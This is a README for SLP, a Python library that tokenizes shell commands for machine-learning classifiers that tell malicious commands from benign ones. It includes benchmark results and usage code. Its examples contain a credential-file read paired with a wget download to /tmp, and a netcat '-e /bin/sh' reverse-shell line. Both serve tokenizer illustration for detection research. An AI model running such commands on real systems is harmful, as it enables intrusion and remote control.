Shell Language Processing (SLP)
SLP provides tokenizer and encoder classes for parsing Unix/Linux shell commands, so that raw commands (e.g. from auditd logs or bash history) can be used for machine learning purposes.
Evaluation
We evaluated tokenization quality against two alternatives from NLTK, WordPunctTokenizer and WhitespaceTokenizer, which are known to be used in industry for IT log parsing.
Results:
Tokenizer | F1 | Precision | Recall | AUC |
---|---|---|---|---|
SLP (ours) | 0.874 | 0.980 | 0.789 | 0.994 |
WordPunct | 0.392 | 1.0 | 0.244 | 0.988 |
WhiteSpace | 0.164 | 1.0 | 0.089 | 0.942 |
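One intuition for the difference: general-purpose tokenizers either shred or fuse shell syntax in ways that hurt downstream feature quality. A minimal NLTK illustration (the output comments are abbreviated):

```python
from nltk.tokenize import WordPunctTokenizer, WhitespaceTokenizer

cmd = "cat /etc/passwd|grep root && wget http://example.com/x.sh -O /tmp/x"

# WordPunct splits on every punctuation run, shredding paths, flags and URLs
print(WordPunctTokenizer().tokenize(cmd))
# ['cat', '/', 'etc', '/', 'passwd', '|', 'grep', 'root', '&&', 'wget', 'http', '://', ...]

# Whitespace keeps the pipe written without spaces fused into one opaque token
print(WhitespaceTokenizer().tokenize(cmd))
# ['cat', '/etc/passwd|grep', 'root', '&&', 'wget', 'http://example.com/x.sh', '-O', '/tmp/x']
```

SLP's ShellTokenizer aims to keep shell-meaningful units such as executables, flags and paths intact (compare the most frequent tokens in the usage example below).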
The assessment was done on a security classification problem, where we train an ML model to distinguish malicious command samples from benign activity.
Legitimate commands in data/nl2bash.cm consist of the nl2bash dataset. The original data can be found here.
Malicious examples in data/malicious.cm were collected from various penetration testing resources and scripts.
All commands are normalized: domain names are replaced with example.com and all IP addresses with 1.1.1.1, so the evaluation focuses on the syntactic structure of the commands. For practical deployments we suggest performing a similar normalization to avoid overfitting to specific hostnames or addresses. Maliciousness checks of IP addresses or hostnames can be performed separately, in a manual manner, using something like the GreyNoise API.
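A minimal sketch of such a normalization step, using two deliberately naive regular expressions (the patterns and the normalize helper are illustrative assumptions, not part of SLP, and will not cover e.g. IPv6 addresses or unusual hostname forms):

```python
import re

# naive patterns for illustration only
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)

def normalize(command: str) -> str:
    # replace IPs first, then hostnames
    command = IP_RE.sub("1.1.1.1", command)
    # note: the domain pattern may also hit dotted filenames (e.g. x.sh); tighten it for real data
    command = DOMAIN_RE.sub("example.com", command)
    return command

print(normalize("nc 10.0.0.5 4444 -e /bin/sh && curl http://evil-domain.org/"))
# nc 1.1.1.1 4444 -e /bin/sh && curl http://example.com/
```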
For classification we train a gradient-boosted ensemble of decision trees, using the implementation from XGBoost.
Experiments can be observed or replicated in this notebook.
Example usage
```python
from pprint import pprint
from slp import ShellTokenizer, ShellEncoder

with open("commands.txt") as file:
    data = file.readlines()

tokenizer = ShellTokenizer()
command_corpus, command_counter = tokenizer.tokenize(data)
print(command_counter.most_common(5))
"""
[('find', 7846),
('|', 6487),
('.', 3775),
('-name', 3616),
('-type', 3403)]
"""
encoder = ShellEncoder(command_corpus, command_counter, top_tokens=500, verbose=False)
X_tfidf = encoder.tfidf()
# shape: (commands, top_tokens)
print(X_tfidf.shape)
pprint(X_tfidf.toarray()[:5,:])
"""
(100, 500)
array([[0.15437351, 0.09073 , 0. , ..., 0. , 0. ,
0. ],
[0.05145784, 0.06048667, 0.2277968 , ..., 0. , 0. ,
0. ],
[0.03704964, 0.0435504 , 0.16401369, ..., 0. , 0. ,
0. ],
[0. , 0.36292 , 0. , ..., 0. , 0. ,
0. ],
[0.18524821, 0.217752 , 0. , ..., 0. , 0. ,
0. ]])
"""
At this point the data is ready to be supplied as input to your ML model:
```python
mymodel.fit(X_tfidf, y)
```
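For instance, with an XGBoost classifier as in the evaluation above; the label vector y below is a hypothetical placeholder (0 for benign, 1 for malicious, aligned with the 100 commands encoded above), and the split and metric are just one reasonable setup:

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from xgboost import XGBClassifier

# hypothetical labels for the 100 encoded commands: 0 = benign, 1 = malicious
y = np.array([0] * 80 + [1] * 20)

X_train, X_test, y_train, y_test = train_test_split(
    X_tfidf, y, test_size=0.3, random_state=42, stratify=y
)

model = XGBClassifier(n_estimators=100)
model.fit(X_train, y_train)
print(f1_score(y_test, model.predict(X_test)))
```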
Additional notes
- Tokenization heavily depends on the bashlex library, but SLP implements additional wrapping for problematic cases.
- Some ideas for exploratory data analysis, visualizations, and examples can be found under /eda/ and /examples/.